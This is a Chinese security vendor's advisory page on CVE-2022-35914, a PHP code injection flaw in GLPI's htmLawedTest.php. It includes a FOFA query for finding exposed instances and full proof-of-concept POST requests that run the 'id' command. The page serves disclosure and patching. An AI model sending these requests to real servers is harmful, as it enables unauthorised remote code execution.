提交需求
*
*

*
*
*
立即提交
点击”立即提交”,表明我理解并同意 《美创科技隐私条款》
免费试用
400-811-3777

logo

    产品与服务
    解决方案
    技术支持
    合作发展
    关于美创
    申请试用
      热门阅读
      1

      四年同行,韧性共铸:西南某商行携手美创科技再度通过年度容灾大考

      2025-12-26

       2

      以“AI+数据安全”领雁!祝贺美创牵头项目入选浙江省科技厅“尖兵领雁”计划 !

      2025-12-22

       3

      美创AI灾备专家:引领灾备领域迈入“智能化”时代

      2025-12-15

       4

      热点观察|美创科技丁斐:数据安全 × 价值共创?可信数据空间的 “双向奔赴”

      2025-12-03

       5

      美创科技高校供应链数据安全方案斩获 2025 年度 “金智奖”

      2025-12-03
      相关文章

      Strix自动渗透测试平台搭建与使用

      2025-12-22

      每周安全速递³⁷⁰ | 勒索软件攻击导致心理健康机构超11万人数据泄露

      2025-12-19

      每周安全速递³⁶⁹ | 安卓勒索软件DroidLock针对西班牙语言用户进行攻击

      2025-12-15

      每周安全速递³⁶⁸ | 美国电信与汽车服务巨头遭Cl0p勒索攻击

      2025-12-05

      每周安全速递³⁶⁷ | ShinyHunters 开发新型勒索软件ShinySp1d3r

      2025-11-21
      CVE-2022-35914:GLPI 注入漏洞简析
      发布时间:2023-02-10 阅读次数: 795 次
      漏洞概述

      GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。

      GLPI 10.0.2及之前版本存在安全漏洞,该漏洞源于htmlawed 模块中的 /vendor/htmlawed/htmlawed/htmLawedTest.php 允许 PHP 代码注入。漏洞编号:CVE-2022-35914,漏洞等级:高危。

      影响版本

      GLPI 10.0.2及之前版本

      漏洞复现

      fofa搜索语法:


      title="GLPI - 登陆入口"

      图片

      使用Burpsuite工具抓包,执行如下POC获取token和sid的值。



      POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=d531j7fek8t6v3d0d0jpk558q5Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
      token=6dfbe8fefb8bf88a06596e458b976911&text=id&hhook=exec&sid=d531j7fek8t6v3d0d0jpk558q5
      图片
      图片

      将sid在cookie头和POST数据包token参数中替换,将token在POST数据包token参数中替换,exec执行id命令,得到回显。




      POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=53lec8gbd0dvh64k0ikst1d0riUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
      token=94dd0c78fff81fb34a491754631e8ee7&text=id&hhook=exec&sid=53lec8gbd0dvh64k0ikst1d0ri

      图片

      处置建议

      根据官方文档升级至最新版本。


      上一条:每周安全速递²⁴⁷|丰田GSPIMS网站中的严重漏洞允许访问敏感信息
      下一条:美创科技发布《2023年1月勒索病毒威胁报告》
      返回
      关注或联系美创
      官方订阅号 官方订阅号
      官方服务号 官方服务号
      第59号 第59号
      服务热线:400-811-3777
      商务合作:marketing@mchz.com.cn
      友情链接 中央网信办 公安部 工信部 CNCERT 中国信通院 中国软件测评中心 国家工业信息安全发展研究中心 赛迪研究院
      Copyright © 2024 杭州美创科技股份有限公司 All rights reserved.
      浙公网安备 33010502006954号 浙ICP备12021012号-1 网站地图 网站声明及隐私保护政策
      免费试用
      服务热线

      马上咨询

      400-811-3777

      回到顶部